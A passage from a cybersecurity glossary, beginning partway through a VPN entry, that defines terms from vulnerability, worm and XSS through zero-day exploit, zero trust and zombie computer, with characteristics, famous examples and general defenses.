Uses: Remote work, privacy protection, bypassing geo-restrictions, securing public Wi-Fi

Protocols: OpenVPN, WireGuard, IKEv2/IPsec, L2TP/IPsec, PPTP (deprecated)

Related Terms: Encryption, Tunneling, Remote Access, Network Security

Security Concept

Vulnerability

Definition: A weakness or flaw in a system, application, or network that can be exploited by threats to gain unauthorized access or cause harm.

Detailed Explanation: Vulnerabilities can exist in software code, system configurations, security controls, or procedures. They represent potential entry points for attackers.

Vulnerability Types:

  • Software Bugs: Coding errors, buffer overflows, race conditions
  • Misconfigurations: Weak settings, default credentials
  • Design Flaws: Architectural weaknesses
  • Missing Updates: Unpatched known vulnerabilities
  • Social Engineering: Human factors

Severity Ratings: CVSS (Common Vulnerability Scoring System) rates from 0-10

Management: Vulnerability scanning, patch management, security testing, risk assessment

Related Terms: Exploit, Patch, Zero-day, CVE (Common Vulnerabilities and Exposures)

W

Malware

Worm

Definition: A self-replicating malware that spreads across networks automatically without requiring user action or host files.

Detailed Explanation: Unlike viruses, worms are standalone programs that propagate independently, often exploiting network vulnerabilities. They can spread rapidly across networks, consuming bandwidth and system resources.

Characteristics:

  • Self-contained executable programs
  • Automatic propagation without human intervention
  • Can spread across networks rapidly
  • Often exploit specific vulnerabilities
  • Can carry additional payloads (ransomware, backdoors)

Famous Examples: Morris Worm (1988), ILOVEYOU, Conficker, WannaCry (crypto-worm)

Prevention: Network segmentation, patch management, firewalls, IDS/IPS, disabling unnecessary services

Related Terms: Malware, Virus, Network Security, Exploit, Patch Management

X

Attack Type

XSS (Cross-Site Scripting)

Definition: See Cross-Site Scripting in section C for a detailed explanation.

Quick Reference: Web vulnerability allowing attackers to inject malicious scripts into trusted websites, executing in victims' browsers.

Related Terms: Web Application Security, SQL Injection, Input Validation, CSRF

Y

Security Concept

Yellow Team

Definition: In cybersecurity exercises, the team responsible for building and managing the infrastructure, scenarios, and technical environment for Red Team (attackers) and Blue Team (defenders) exercises.

Detailed Explanation: Yellow Teams ensure exercises run smoothly, manage the test environment, track activities, and help evaluate both Red and Blue team performance without interfering with the simulation.

Responsibilities: Environment setup, scenario development, monitoring, scoring, technical support, post-exercise analysis

Related Terms: Red Team, Blue Team, Purple Team, Penetration Testing

Z

Attack Concept

Zero-Day Exploit

Definition: An attack that exploits a previously unknown vulnerability in software or hardware, occurring on the same day the vulnerability becomes known to the vendor ("zero days" to fix).

Detailed Explanation: Zero-day exploits are extremely dangerous because no patch exists yet. They're highly valued in underground markets and used in APT attacks and cyber warfare.

Lifecycle:

  • Day Zero: Vulnerability discovered (possibly used without vendor knowledge)
  • Discovery: Vendor or security researchers become aware
  • Disclosure: Vulnerability publicly disclosed (responsible or not)
  • Patch Development: Vendor creates fix
  • Patch Release: Fix becomes available
  • Deployment: Users apply patches

Impact: High value to attackers, difficult to defend against, can affect millions of users

Defense: Defense-in-depth, anomaly detection, sandboxing, limiting privileges, rapid patch deployment

Related Terms: Vulnerability, Exploit, Patch, APT, Responsible Disclosure

Security Concept

Zero Trust Architecture

Definition: A security model that requires strict verification for every person and device trying to access resources, regardless of whether they're inside or outside the network perimeter.

Detailed Explanation: Zero Trust assumes no implicit trust based on network location. It applies the principle "never trust, always verify" to all access requests, continuously validating security posture.

Core Principles:

  • Verify Explicitly: Always authenticate and authorize
  • Least Privilege Access: Limit access to minimum necessary
  • Assume Breach: Design with assumption of compromise
  • Microsegmentation: Segment access by workload
  • Continuous Monitoring: Constantly assess security posture

Implementation: Identity and access management (IAM), microsegmentation, encryption, analytics, automation

Benefits: Reduces breach impact, supports remote work, improves visibility, adaptive security

Related Terms: Network Segmentation, IAM, Least Privilege, Microsegmentation, Perimeter Security

Malware

Zombie Computer

Definition: A computer that has been infected with malware and is controlled remotely by an attacker, often as part of a botnet, without the owner's knowledge.

Detailed Explanation: Zombie computers (or "bots") are compromised systems used collectively in botnets for malicious activities. Owners typically don't know their devices are infected and being used for attacks.

Common Uses:

  • DDoS attacks
  • Spam distribution
  • Cryptocurrency mining
  • Credential stuffing
  • Click fraud

Signs of Infection: Slow performance, high network activity, unexpected CPU usage, frequent crashes

Prevention: Antivirus software, firewalls, regular updates, safe browsing practices

Related Terms: Botnet, Command and Control (C2), DDoS, Malware